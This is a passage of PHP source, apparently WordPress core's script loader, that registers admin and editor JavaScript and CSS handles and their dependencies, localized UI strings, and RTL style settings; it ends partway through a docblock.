$scripts->set_translations( 'wp-theme-plugin-editor' );
$scripts->add( 'wp-playlist', "/wp-includes/js/mediaelement/wp-playlist$suffix.js", array( 'wp-util', 'backbone', 'mediaelement' ), false, 1 );
$scripts->add( 'zxcvbn-async', "/wp-includes/js/zxcvbn-async$suffix.js", array(), '1.0' );
did_action( 'init' ) && $scripts->localize(
'zxcvbn-async',
'_zxcvbnSettings',
array(
'src' => empty( $guessed_url ) ? includes_url( '/js/zxcvbn.min.js' ) : $scripts->base_url . '/wp-includes/js/zxcvbn.min.js',
)
);
$scripts->add( 'password-strength-meter', "/wp-admin/js/password-strength-meter$suffix.js", array( 'jquery', 'zxcvbn-async' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'password-strength-meter',
'pwsL10n',
array(
'unknown' => _x( 'Password strength unknown', 'password strength' ),
'short' => _x( 'Very weak', 'password strength' ),
'bad' => _x( 'Weak', 'password strength' ),
'good' => _x( 'Medium', 'password strength' ),
'strong' => _x( 'Strong', 'password strength' ),
'mismatch' => _x( 'Mismatch', 'password mismatch' ),
)
);
$scripts->set_translations( 'password-strength-meter' );
$scripts->add( 'password-toggle', "/wp-admin/js/password-toggle$suffix.js", array(), false, 1 );
$scripts->set_translations( 'password-toggle' );
$scripts->add( 'application-passwords', "/wp-admin/js/application-passwords$suffix.js", array( 'jquery', 'wp-util', 'wp-api-request', 'wp-date', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'application-passwords' );
$scripts->add( 'auth-app', "/wp-admin/js/auth-app$suffix.js", array( 'jquery', 'wp-api-request', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'auth-app' );
$scripts->add( 'user-profile', "/wp-admin/js/user-profile$suffix.js", array( 'clipboard', 'jquery', 'password-strength-meter', 'wp-util', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'user-profile' );
$user_id = isset( $_GET['user_id'] ) ? (int) $_GET['user_id'] : 0;
did_action( 'init' ) && $scripts->localize(
'user-profile',
'userProfileL10n',
array(
'user_id' => $user_id,
'nonce' => wp_installing() ? '' : wp_create_nonce( 'reset-password-for-' . $user_id ),
)
);
$scripts->add( 'language-chooser', "/wp-admin/js/language-chooser$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'user-suggest', "/wp-admin/js/user-suggest$suffix.js", array( 'jquery-ui-autocomplete' ), false, 1 );
$scripts->add( 'admin-bar', "/wp-includes/js/admin-bar$suffix.js", array( 'hoverintent-js' ), false, 1 );
$scripts->add( 'wplink', "/wp-includes/js/wplink$suffix.js", array( 'common', 'jquery', 'wp-a11y', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'wplink' );
did_action( 'init' ) && $scripts->localize(
'wplink',
'wpLinkL10n',
array(
'title' => __( 'Insert/edit link' ),
'update' => __( 'Update' ),
'save' => __( 'Add Link' ),
'noTitle' => __( '(no title)' ),
'noMatchesFound' => __( 'No results found.' ),
'linkSelected' => __( 'Link selected.' ),
'linkInserted' => __( 'Link inserted.' ),
/* translators: Minimum input length in characters to start searching posts in the "Insert/edit link" modal. */
'minInputLength' => (int) _x( '3', 'minimum input length for searching post links' ),
)
);
$scripts->add( 'wpdialogs', "/wp-includes/js/wpdialog$suffix.js", array( 'jquery-ui-dialog' ), false, 1 );
$scripts->add( 'word-count', "/wp-admin/js/word-count$suffix.js", array(), false, 1 );
$scripts->add( 'media-upload', "/wp-admin/js/media-upload$suffix.js", array( 'thickbox', 'shortcode' ), false, 1 );
$scripts->add( 'hoverIntent', "/wp-includes/js/hoverIntent$suffix.js", array( 'jquery' ), '1.10.2', 1 );
// JS-only version of hoverintent (no dependencies).
$scripts->add( 'hoverintent-js', '/wp-includes/js/hoverintent-js.min.js', array(), '2.2.1', 1 );
$scripts->add( 'customize-base', "/wp-includes/js/customize-base$suffix.js", array( 'jquery', 'underscore' ), false, 1 );
$scripts->add( 'customize-loader', "/wp-includes/js/customize-loader$suffix.js", array( 'customize-base' ), false, 1 );
$scripts->add( 'customize-preview', "/wp-includes/js/customize-preview$suffix.js", array( 'wp-a11y', 'customize-base' ), false, 1 );
$scripts->add( 'customize-models', '/wp-includes/js/customize-models.js', array( 'underscore', 'backbone' ), false, 1 );
$scripts->add( 'customize-views', '/wp-includes/js/customize-views.js', array( 'jquery', 'underscore', 'imgareaselect', 'customize-models', 'media-editor', 'media-views' ), false, 1 );
$scripts->add( 'customize-controls', "/wp-admin/js/customize-controls$suffix.js", array( 'customize-base', 'wp-a11y', 'wp-util', 'jquery-ui-core' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'customize-controls',
'_wpCustomizeControlsL10n',
array(
'activate' => __( 'Activate & Publish' ),
'save' => __( 'Save & Publish' ), // @todo Remove as not required.
'publish' => __( 'Publish' ),
'published' => __( 'Published' ),
'saveDraft' => __( 'Save Draft' ),
'draftSaved' => __( 'Draft Saved' ),
'updating' => __( 'Updating' ),
'schedule' => _x( 'Schedule', 'customizer changeset action/button label' ),
'scheduled' => _x( 'Scheduled', 'customizer changeset status' ),
'invalid' => __( 'Invalid' ),
'saveBeforeShare' => __( 'Please save your changes in order to share the preview.' ),
'futureDateError' => __( 'You must supply a future date to schedule.' ),
'saveAlert' => __( 'The changes you made will be lost if you navigate away from this page.' ),
'saved' => __( 'Saved' ),
'cancel' => __( 'Cancel' ),
'close' => __( 'Close' ),
'action' => __( 'Action' ),
'discardChanges' => __( 'Discard changes' ),
'cheatin' => __( 'An error occurred. Please try again later.' ),
'notAllowedHeading' => __( 'You need a higher level of permission.' ),
'notAllowed' => __( 'Sorry, you are not allowed to customize this site.' ),
'previewIframeTitle' => __( 'Site Preview' ),
'loginIframeTitle' => __( 'Session expired' ),
'collapseSidebar' => _x( 'Hide Controls', 'label for hide controls button without length constraints' ),
'expandSidebar' => _x( 'Show Controls', 'label for hide controls button without length constraints' ),
'untitledBlogName' => __( '(Untitled)' ),
'unknownRequestFail' => __( 'Looks like something’s gone wrong. Wait a couple seconds, and then try again.' ),
'themeDownloading' => __( 'Downloading your new theme…' ),
'themePreviewWait' => __( 'Setting up your live preview. This may take a bit.' ),
'revertingChanges' => __( 'Reverting unpublished changes…' ),
'trashConfirm' => __( 'Are you sure you want to discard your unpublished changes?' ),
/* translators: %s: Display name of the user who has taken over the changeset in customizer. */
'takenOverMessage' => __( '%s has taken over and is currently customizing.' ),
/* translators: %s: URL to the Customizer to load the autosaved version. */
'autosaveNotice' => __( 'There is a more recent autosave of your changes than the one you are previewing. <a href="%s">Restore the autosave</a>' ),
'videoHeaderNotice' => __( 'This theme does not support video headers on this page. Navigate to the front page or another page that supports video headers.' ),
// Used for overriding the file types allowed in Plupload.
'allowedFiles' => __( 'Allowed Files' ),
'customCssError' => array(
/* translators: %d: Error count. */
'singular' => _n( 'There is %d error which must be fixed before you can save.', 'There are %d errors which must be fixed before you can save.', 1 ),
/* translators: %d: Error count. */
'plural' => _n( 'There is %d error which must be fixed before you can save.', 'There are %d errors which must be fixed before you can save.', 2 ),
// @todo This is lacking, as some languages have a dedicated dual form. For proper handling of plurals in JS, see #20491.
),
'pageOnFrontError' => __( 'Homepage and posts page must be different.' ),
'saveBlockedError' => array(
/* translators: %s: Number of invalid settings. */
'singular' => _n( 'Unable to save due to %s invalid setting.', 'Unable to save due to %s invalid settings.', 1 ),
/* translators: %s: Number of invalid settings. */
'plural' => _n( 'Unable to save due to %s invalid setting.', 'Unable to save due to %s invalid settings.', 2 ),
// @todo This is lacking, as some languages have a dedicated dual form. For proper handling of plurals in JS, see #20491.
),
'scheduleDescription' => __( 'Schedule your customization changes to publish ("go live") at a future date.' ),
'themePreviewUnavailable' => __( 'Sorry, you cannot preview new themes when you have changes scheduled or saved as a draft. Please publish your changes, or wait until they publish to preview new themes.' ),
'themeInstallUnavailable' => sprintf(
/* translators: %s: URL to Add Themes admin screen. */
__( 'You will not be able to install new themes from here yet since your install requires SFTP credentials. For now, please <a href="%s">add themes in the admin</a>.' ),
esc_url( admin_url( 'theme-install.php' ) )
),
'publishSettings' => __( 'Publish Settings' ),
'invalidDate' => __( 'Invalid date.' ),
'invalidValue' => __( 'Invalid value.' ),
'blockThemeNotification' => sprintf(
/* translators: 1: Link to Site Editor documentation on HelpHub, 2: HTML button. */
__( 'Hurray! Your theme supports site editing with blocks. <a href="%1$s">Tell me more</a>. %2$s' ),
__( 'https://wordpress.org/documentation/article/site-editor/' ),
sprintf(
'<button type="button" data-action="%1$s" class="button switch-to-editor">%2$s</button>',
esc_url( admin_url( 'site-editor.php' ) ),
__( 'Use Site Editor' )
)
),
)
);
$scripts->add( 'customize-selective-refresh', "/wp-includes/js/customize-selective-refresh$suffix.js", array( 'jquery', 'wp-util', 'customize-preview' ), false, 1 );
$scripts->add( 'customize-widgets', "/wp-admin/js/customize-widgets$suffix.js", array( 'jquery', 'jquery-ui-sortable', 'jquery-ui-droppable', 'wp-backbone', 'customize-controls' ), false, 1 );
$scripts->add( 'customize-preview-widgets', "/wp-includes/js/customize-preview-widgets$suffix.js", array( 'jquery', 'wp-util', 'customize-preview', 'customize-selective-refresh' ), false, 1 );
$scripts->add( 'customize-nav-menus', "/wp-admin/js/customize-nav-menus$suffix.js", array( 'jquery', 'wp-backbone', 'customize-controls', 'accordion', 'nav-menu', 'wp-sanitize' ), false, 1 );
$scripts->add( 'customize-preview-nav-menus', "/wp-includes/js/customize-preview-nav-menus$suffix.js", array( 'jquery', 'wp-util', 'customize-preview', 'customize-selective-refresh' ), false, 1 );
$scripts->add( 'wp-custom-header', "/wp-includes/js/wp-custom-header$suffix.js", array( 'wp-a11y' ), false, 1 );
$scripts->add( 'accordion', "/wp-admin/js/accordion$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'shortcode', "/wp-includes/js/shortcode$suffix.js", array( 'underscore' ), false, 1 );
$scripts->add( 'media-models', "/wp-includes/js/media-models$suffix.js", array( 'wp-backbone' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'media-models',
'_wpMediaModelsL10n',
array(
'settings' => array(
'ajaxurl' => admin_url( 'admin-ajax.php', 'relative' ),
'post' => array( 'id' => 0 ),
),
)
);
$scripts->add( 'wp-embed', "/wp-includes/js/wp-embed$suffix.js" );
did_action( 'init' ) && $scripts->add_data( 'wp-embed', 'strategy', 'defer' );
/*
* To enqueue media-views or media-editor, call wp_enqueue_media().
* Both rely on numerous settings, styles, and templates to operate correctly.
*/
$scripts->add( 'media-views', "/wp-includes/js/media-views$suffix.js", array( 'utils', 'media-models', 'wp-plupload', 'jquery-ui-sortable', 'wp-mediaelement', 'wp-api-request', 'wp-a11y', 'clipboard' ), false, 1 );
$scripts->set_translations( 'media-views' );
$scripts->add( 'media-editor', "/wp-includes/js/media-editor$suffix.js", array( 'shortcode', 'media-views' ), false, 1 );
$scripts->set_translations( 'media-editor' );
$scripts->add( 'media-audiovideo', "/wp-includes/js/media-audiovideo$suffix.js", array( 'media-editor' ), false, 1 );
$scripts->add( 'mce-view', "/wp-includes/js/mce-view$suffix.js", array( 'shortcode', 'jquery', 'media-views', 'media-audiovideo' ), false, 1 );
$scripts->add( 'wp-api', "/wp-includes/js/wp-api$suffix.js", array( 'jquery', 'backbone', 'underscore', 'wp-api-request' ), false, 1 );
if ( is_admin() ) {
$scripts->add( 'admin-tags', "/wp-admin/js/tags$suffix.js", array( 'jquery', 'wp-ajax-response' ), false, 1 );
$scripts->set_translations( 'admin-tags' );
$scripts->add( 'admin-comments', "/wp-admin/js/edit-comments$suffix.js", array( 'wp-lists', 'quicktags', 'jquery-query', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'admin-comments' );
did_action( 'init' ) && $scripts->localize(
'admin-comments',
'adminCommentsSettings',
array(
'hotkeys_highlight_first' => isset( $_GET['hotkeys_highlight_first'] ),
'hotkeys_highlight_last' => isset( $_GET['hotkeys_highlight_last'] ),
)
);
$scripts->add( 'xfn', "/wp-admin/js/xfn$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'postbox', "/wp-admin/js/postbox$suffix.js", array( 'jquery-ui-sortable', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'postbox' );
$scripts->add( 'tags-box', "/wp-admin/js/tags-box$suffix.js", array( 'jquery', 'tags-suggest' ), false, 1 );
$scripts->set_translations( 'tags-box' );
$scripts->add( 'tags-suggest', "/wp-admin/js/tags-suggest$suffix.js", array( 'common', 'jquery-ui-autocomplete', 'wp-a11y', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'tags-suggest' );
$scripts->add( 'post', "/wp-admin/js/post$suffix.js", array( 'suggest', 'wp-lists', 'postbox', 'tags-box', 'underscore', 'word-count', 'wp-a11y', 'wp-sanitize', 'clipboard' ), false, 1 );
$scripts->set_translations( 'post' );
$scripts->add( 'editor-expand', "/wp-admin/js/editor-expand$suffix.js", array( 'jquery', 'underscore' ), false, 1 );
$scripts->add( 'link', "/wp-admin/js/link$suffix.js", array( 'wp-lists', 'postbox' ), false, 1 );
$scripts->add( 'comment', "/wp-admin/js/comment$suffix.js", array( 'jquery', 'postbox' ), false, 1 );
$scripts->set_translations( 'comment' );
$scripts->add( 'admin-gallery', "/wp-admin/js/gallery$suffix.js", array( 'jquery-ui-sortable' ) );
$scripts->add( 'admin-widgets', "/wp-admin/js/widgets$suffix.js", array( 'jquery-ui-sortable', 'jquery-ui-draggable', 'jquery-ui-droppable', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'admin-widgets' );
$scripts->add( 'media-widgets', "/wp-admin/js/widgets/media-widgets$suffix.js", array( 'jquery', 'media-models', 'media-views', 'wp-api-request' ) );
$scripts->add_inline_script( 'media-widgets', 'wp.mediaWidgets.init();', 'after' );
$scripts->add( 'media-audio-widget', "/wp-admin/js/widgets/media-audio-widget$suffix.js", array( 'media-widgets', 'media-audiovideo' ) );
$scripts->add( 'media-image-widget', "/wp-admin/js/widgets/media-image-widget$suffix.js", array( 'media-widgets' ) );
$scripts->add( 'media-gallery-widget', "/wp-admin/js/widgets/media-gallery-widget$suffix.js", array( 'media-widgets' ) );
$scripts->add( 'media-video-widget', "/wp-admin/js/widgets/media-video-widget$suffix.js", array( 'media-widgets', 'media-audiovideo', 'wp-api-request' ) );
$scripts->add( 'text-widgets', "/wp-admin/js/widgets/text-widgets$suffix.js", array( 'jquery', 'backbone', 'editor', 'wp-util', 'wp-a11y' ) );
$scripts->add( 'custom-html-widgets', "/wp-admin/js/widgets/custom-html-widgets$suffix.js", array( 'jquery', 'backbone', 'wp-util', 'jquery-ui-core', 'wp-a11y' ) );
$scripts->add( 'theme', "/wp-admin/js/theme$suffix.js", array( 'wp-backbone', 'wp-a11y', 'customize-base' ), false, 1 );
$scripts->add( 'inline-edit-post', "/wp-admin/js/inline-edit-post$suffix.js", array( 'jquery', 'tags-suggest', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'inline-edit-post' );
$scripts->add( 'inline-edit-tax', "/wp-admin/js/inline-edit-tax$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'inline-edit-tax' );
$scripts->add( 'plugin-install', "/wp-admin/js/plugin-install$suffix.js", array( 'jquery', 'jquery-ui-core', 'thickbox' ), false, 1 );
$scripts->set_translations( 'plugin-install' );
$scripts->add( 'site-health', "/wp-admin/js/site-health$suffix.js", array( 'clipboard', 'jquery', 'wp-util', 'wp-a11y', 'wp-api-request', 'wp-url', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'site-health' );
$scripts->add( 'privacy-tools', "/wp-admin/js/privacy-tools$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'privacy-tools' );
$scripts->add( 'updates', "/wp-admin/js/updates$suffix.js", array( 'common', 'jquery', 'wp-util', 'wp-a11y', 'wp-sanitize', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'updates' );
did_action( 'init' ) && $scripts->localize(
'updates',
'_wpUpdatesSettings',
array(
'ajax_nonce' => wp_installing() ? '' : wp_create_nonce( 'updates' ),
)
);
$scripts->add( 'farbtastic', '/wp-admin/js/farbtastic.js', array( 'jquery' ), '1.2' );
$scripts->add( 'iris', '/wp-admin/js/iris.min.js', array( 'jquery-ui-draggable', 'jquery-ui-slider', 'jquery-touch-punch' ), '1.1.1', 1 );
$scripts->add( 'wp-color-picker', "/wp-admin/js/color-picker$suffix.js", array( 'iris' ), false, 1 );
$scripts->set_translations( 'wp-color-picker' );
$scripts->add( 'dashboard', "/wp-admin/js/dashboard$suffix.js", array( 'common', 'jquery', 'admin-comments', 'postbox', 'wp-util', 'wp-a11y', 'wp-date' ), false, 1 );
$scripts->set_translations( 'dashboard' );
$scripts->add( 'list-revisions', "/wp-includes/js/wp-list-revisions$suffix.js" );
$scripts->add( 'media-grid', "/wp-includes/js/media-grid$suffix.js", array( 'media-editor' ), false, 1 );
$scripts->add( 'media', "/wp-admin/js/media$suffix.js", array( 'jquery', 'clipboard', 'wp-i18n', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'media' );
$scripts->add( 'image-edit', "/wp-admin/js/image-edit$suffix.js", array( 'jquery', 'jquery-ui-core', 'imgareaselect', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'image-edit' );
$scripts->add( 'set-post-thumbnail', "/wp-admin/js/set-post-thumbnail$suffix.js", array( 'jquery' ), false, 1 );
$scripts->set_translations( 'set-post-thumbnail' );
/*
* Navigation Menus: Adding underscore as a dependency to utilize _.debounce
* see https://core.trac.wordpress.org/ticket/42321
*/
$scripts->add( 'nav-menu', "/wp-admin/js/nav-menu$suffix.js", array( 'jquery-ui-sortable', 'jquery-ui-draggable', 'jquery-ui-droppable', 'wp-lists', 'postbox', 'underscore' ) );
$scripts->set_translations( 'nav-menu' );
$scripts->add( 'custom-header', '/wp-admin/js/custom-header.js', array( 'jquery-masonry' ), false, 1 );
$scripts->add( 'custom-background', "/wp-admin/js/custom-background$suffix.js", array( 'wp-color-picker', 'media-views' ), false, 1 );
$scripts->add( 'media-gallery', "/wp-admin/js/media-gallery$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'svg-painter', '/wp-admin/js/svg-painter.js', array( 'jquery' ), false, 1 );
}
}
/**
* Assigns default styles to $styles object.
*
* Nothing is returned, because the $styles parameter is passed by reference.
* Meaning that whatever object is passed will be updated without having to
* reassign the variable that was passed back to the same value. This saves
* memory.
*
* Adding default styles is not the only task, it also assigns the base_url
* property, the default version, and text direction for the object.
*
* @since 2.6.0
*
* @global array $editor_styles
*
* @param WP_Styles $styles
*/
function wp_default_styles( $styles ) {
global $editor_styles;
/*
* Include an unmodified $wp_version.
*
* Note: wp_get_wp_version() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* wp-includes/functions.php is not loaded.
*/
require ABSPATH . WPINC . '/version.php';
if ( ! defined( 'SCRIPT_DEBUG' ) ) {
/*
* Note: str_contains() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* the polyfills from wp-includes/compat.php are not loaded.
*/
define( 'SCRIPT_DEBUG', false !== strpos( $wp_version, '-src' ) );
}
$guessurl = site_url();
if ( ! $guessurl ) {
$guessurl = wp_guess_url();
}
$styles->base_url = $guessurl;
$styles->content_url = defined( 'WP_CONTENT_URL' ) ? WP_CONTENT_URL : '';
$styles->default_version = get_bloginfo( 'version' );
$styles->text_direction = function_exists( 'is_rtl' ) && is_rtl() ? 'rtl' : 'ltr';
$styles->default_dirs = array( '/wp-admin/', '/wp-includes/css/' );
// Open Sans is no longer used by core, but may be relied upon by themes and plugins.
$open_sans_font_url = '';
/*
* translators: If there are characters in your language that are not supported
* by Open Sans, translate this to 'off'. Do not translate into your own language.
*/
if ( 'off' !== _x( 'on', 'Open Sans font: on or off' ) ) {
$subsets = 'latin,latin-ext';
/*
* translators: To add an additional Open Sans character subset specific to your language,
* translate this to 'greek', 'cyrillic' or 'vietnamese'. Do not translate into your own language.
*/
$subset = _x( 'no-subset', 'Open Sans font: add new subset (greek, cyrillic, vietnamese)' );
if ( 'cyrillic' === $subset ) {
$subsets .= ',cyrillic,cyrillic-ext';
} elseif ( 'greek' === $subset ) {
$subsets .= ',greek,greek-ext';
} elseif ( 'vietnamese' === $subset ) {
$subsets .= ',vietnamese';
}
// Hotlink Open Sans, for now.
$open_sans_font_url = "https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,300,400,600&subset=$subsets&display=fallback";
}
// Register a stylesheet for the selected admin color scheme.
$styles->add( 'colors', true, array( 'wp-admin', 'buttons' ) );
$suffix = SCRIPT_DEBUG ? '' : '.min';
// Admin CSS.
$styles->add( 'common', "/wp-admin/css/common$suffix.css" );
$styles->add( 'forms', "/wp-admin/css/forms$suffix.css" );
$styles->add( 'admin-menu', "/wp-admin/css/admin-menu$suffix.css" );
$styles->add( 'dashboard', "/wp-admin/css/dashboard$suffix.css" );
$styles->add( 'list-tables', "/wp-admin/css/list-tables$suffix.css" );
$styles->add( 'edit', "/wp-admin/css/edit$suffix.css" );
$styles->add( 'revisions', "/wp-admin/css/revisions$suffix.css" );
$styles->add( 'media', "/wp-admin/css/media$suffix.css" );
$styles->add( 'themes', "/wp-admin/css/themes$suffix.css" );
$styles->add( 'about', "/wp-admin/css/about$suffix.css" );
$styles->add( 'nav-menus', "/wp-admin/css/nav-menus$suffix.css" );
$styles->add( 'widgets', "/wp-admin/css/widgets$suffix.css", array( 'wp-pointer' ) );
$styles->add( 'site-icon', "/wp-admin/css/site-icon$suffix.css" );
$styles->add( 'l10n', "/wp-admin/css/l10n$suffix.css" );
$styles->add( 'code-editor', "/wp-admin/css/code-editor$suffix.css", array( 'wp-codemirror' ) );
$styles->add( 'site-health', "/wp-admin/css/site-health$suffix.css" );
$styles->add( 'wp-admin', false, array( 'dashicons', 'common', 'forms', 'admin-menu', 'dashboard', 'list-tables', 'edit', 'revisions', 'media', 'themes', 'about', 'nav-menus', 'widgets', 'site-icon', 'l10n' ) );
$styles->add( 'login', "/wp-admin/css/login$suffix.css", array( 'dashicons', 'buttons', 'forms', 'l10n' ) );
$styles->add( 'install', "/wp-admin/css/install$suffix.css", array( 'dashicons', 'buttons', 'forms', 'l10n' ) );
$styles->add( 'wp-color-picker', "/wp-admin/css/color-picker$suffix.css" );
$styles->add( 'customize-controls', "/wp-admin/css/customize-controls$suffix.css", array( 'wp-admin', 'colors', 'imgareaselect' ) );
$styles->add( 'customize-widgets', "/wp-admin/css/customize-widgets$suffix.css", array( 'wp-admin', 'colors' ) );
$styles->add( 'customize-nav-menus', "/wp-admin/css/customize-nav-menus$suffix.css", array( 'wp-admin', 'colors' ) );
// Common dependencies.
$styles->add( 'buttons', "/wp-includes/css/buttons$suffix.css" );
$styles->add( 'dashicons', "/wp-includes/css/dashicons$suffix.css" );
// Includes CSS.
$styles->add( 'admin-bar', "/wp-includes/css/admin-bar$suffix.css", array( 'dashicons' ) );
$styles->add( 'wp-auth-check', "/wp-includes/css/wp-auth-check$suffix.css", array( 'dashicons' ) );
$styles->add( 'editor-buttons', "/wp-includes/css/editor$suffix.css", array( 'dashicons' ) );
$styles->add( 'media-views', "/wp-includes/css/media-views$suffix.css", array( 'buttons', 'dashicons', 'wp-mediaelement' ) );
$styles->add( 'wp-pointer', "/wp-includes/css/wp-pointer$suffix.css", array( 'dashicons' ) );
$styles->add( 'customize-preview', "/wp-includes/css/customize-preview$suffix.css", array( 'dashicons' ) );
$styles->add( 'wp-empty-template-alert', "/wp-includes/css/wp-empty-template-alert$suffix.css" );
// External libraries and friends.
$styles->add( 'imgareaselect', '/wp-includes/js/imgareaselect/imgareaselect.css', array(), '0.9.8' );
$styles->add( 'wp-jquery-ui-dialog', "/wp-includes/css/jquery-ui-dialog$suffix.css", array( 'dashicons' ) );
$styles->add( 'mediaelement', '/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css', array(), '4.2.17' );
$styles->add( 'wp-mediaelement', "/wp-includes/js/mediaelement/wp-mediaelement$suffix.css", array( 'mediaelement' ) );
$styles->add( 'thickbox', '/wp-includes/js/thickbox/thickbox.css', array( 'dashicons' ) );
$styles->add( 'wp-codemirror', '/wp-includes/js/codemirror/codemirror.min.css', array(), '5.29.1-alpha-ee20357' );
// Deprecated CSS.
$styles->add( 'deprecated-media', "/wp-admin/css/deprecated-media$suffix.css" );
$styles->add( 'farbtastic', "/wp-admin/css/farbtastic$suffix.css", array(), '1.3u1' );
$styles->add( 'jcrop', '/wp-includes/js/jcrop/jquery.Jcrop.min.css', array(), '0.9.15' );
$styles->add( 'colors-fresh', false, array( 'wp-admin', 'buttons' ) ); // Old handle.
$styles->add( 'open-sans', $open_sans_font_url ); // No longer used in core as of 4.6.
$styles->add( 'wp-embed-template-ie', false );
$styles->add_data( 'wp-embed-template-ie', 'conditional', '_required-conditional-dependency_' );
// Noto Serif is no longer used by core, but may be relied upon by themes and plugins.
$fonts_url = '';
/*
* translators: Use this to specify the proper Google Font name and variants
* to load that is supported by your language. Do not translate.
* Set to 'off' to disable loading.
*/
$font_family = _x( 'Noto Serif:400,400i,700,700i', 'Google Font Name and Variants' );
if ( 'off' !== $font_family ) {
$fonts_url = 'https://fonts.googleapis.com/css?family=' . urlencode( $font_family );
}
$styles->add( 'wp-editor-font', $fonts_url ); // No longer used in core as of 5.7.
$block_library_theme_path = WPINC . "/css/dist/block-library/theme$suffix.css";
$styles->add( 'wp-block-library-theme', "/$block_library_theme_path" );
$styles->add_data( 'wp-block-library-theme', 'path', ABSPATH . $block_library_theme_path );
$classic_theme_styles_path = WPINC . "/css/classic-themes$suffix.css";
$styles->add( 'classic-theme-styles', "/$classic_theme_styles_path" );
$styles->add_data( 'classic-theme-styles', 'path', ABSPATH . $classic_theme_styles_path );
$styles->add(
'wp-reset-editor-styles',
"/wp-includes/css/dist/block-library/reset$suffix.css",
array( 'common', 'forms' ) // Make sure the reset is loaded after the default WP Admin styles.
);
$styles->add(
'wp-editor-classic-layout-styles',
"/wp-includes/css/dist/edit-post/classic$suffix.css",
array()
);
$styles->add(
'wp-block-editor-content',
"/wp-includes/css/dist/block-editor/content$suffix.css",
array( 'wp-components' )
);
// Only add CONTENT styles here that should be enqueued in the iframe!
$wp_edit_blocks_dependencies = array(
'wp-components',
/*
* This needs to be added before the block library styles,
* The block library styles override the "reset" styles.
*/
'wp-reset-editor-styles',
'wp-block-library',
'wp-block-editor-content',
);
// Only load the default layout and margin styles for themes without theme.json file.
if ( ! wp_theme_has_theme_json() ) {
$wp_edit_blocks_dependencies[] = 'wp-editor-classic-layout-styles';
}
if (
current_theme_supports( 'wp-block-styles' ) &&
( ! is_array( $editor_styles ) || count( $editor_styles ) === 0 )
) {
/*
* Include opinionated block styles if the theme supports block styles and
* no $editor_styles are declared, so the editor never appears broken.
*/
$wp_edit_blocks_dependencies[] = 'wp-block-library-theme';
}
$styles->add(
'wp-edit-blocks',
"/wp-includes/css/dist/block-library/editor$suffix.css",
$wp_edit_blocks_dependencies
);
$package_styles = array(
'block-editor' => array( 'wp-components', 'wp-preferences' ),
'block-library' => array(),
'block-directory' => array(),
'components' => array(),
'commands' => array( 'wp-components' ),
'edit-post' => array(
'wp-components',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-commands',
'wp-preferences',
),
'editor' => array(
'wp-components',
'wp-block-editor',
'wp-reusable-blocks',
'wp-patterns',
'wp-preferences',
),
'format-library' => array(),
'list-reusable-blocks' => array( 'wp-components' ),
'reusable-blocks' => array( 'wp-components' ),
'patterns' => array( 'wp-components' ),
'preferences' => array( 'wp-components' ),
'nux' => array( 'wp-components' ),
'widgets' => array(
'wp-components',
),
'edit-widgets' => array(
'wp-widgets',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-patterns',
'wp-preferences',
),
'customize-widgets' => array(
'wp-widgets',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-patterns',
'wp-preferences',
),
'edit-site' => array(
'wp-components',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-commands',
'wp-preferences',
),
);
foreach ( $package_styles as $package => $dependencies ) {
$handle = 'wp-' . $package;
$path = "/wp-includes/css/dist/$package/style$suffix.css";
if ( 'block-library' === $package && wp_should_load_separate_core_block_assets() ) {
$path = "/wp-includes/css/dist/$package/common$suffix.css";
}
$styles->add( $handle, $path, $dependencies );
$styles->add_data( $handle, 'path', ABSPATH . $path );
}
// RTL CSS.
$rtl_styles = array(
// Admin CSS.
'common',
'forms',
'admin-menu',
'dashboard',
'list-tables',
'edit',
'revisions',
'media',
'themes',
'about',
'nav-menus',
'widgets',
'site-icon',
'l10n',
'install',
'wp-color-picker',
'customize-controls',
'customize-widgets',
'customize-nav-menus',
'customize-preview',
'login',
'site-health',
'wp-empty-template-alert',
// Includes CSS.
'buttons',
'admin-bar',
'wp-auth-check',
'editor-buttons',
'media-views',
'wp-pointer',
'wp-jquery-ui-dialog',
// Package styles.
'wp-reset-editor-styles',
'wp-editor-classic-layout-styles',
'wp-block-library-theme',
'wp-edit-blocks',
'wp-block-editor',
'wp-block-library',
'wp-block-directory',
'wp-commands',
'wp-components',
'wp-customize-widgets',
'wp-edit-post',
'wp-edit-site',
'wp-edit-widgets',
'wp-editor',
'wp-format-library',
'wp-list-reusable-blocks',
'wp-reusable-blocks',
'wp-patterns',
'wp-nux',
'wp-widgets',
// Deprecated CSS.
'deprecated-media',
'farbtastic',
);
foreach ( $rtl_styles as $rtl_style ) {
$styles->add_data( $rtl_style, 'rtl', 'replace' );
if ( $suffix ) {
$styles->add_data( $rtl_style, 'suffix', $suffix );
}
}
}
/**
* Reorders JavaScript scripts array to place prototype before jQuery.
*
* @since 2.3.1
*
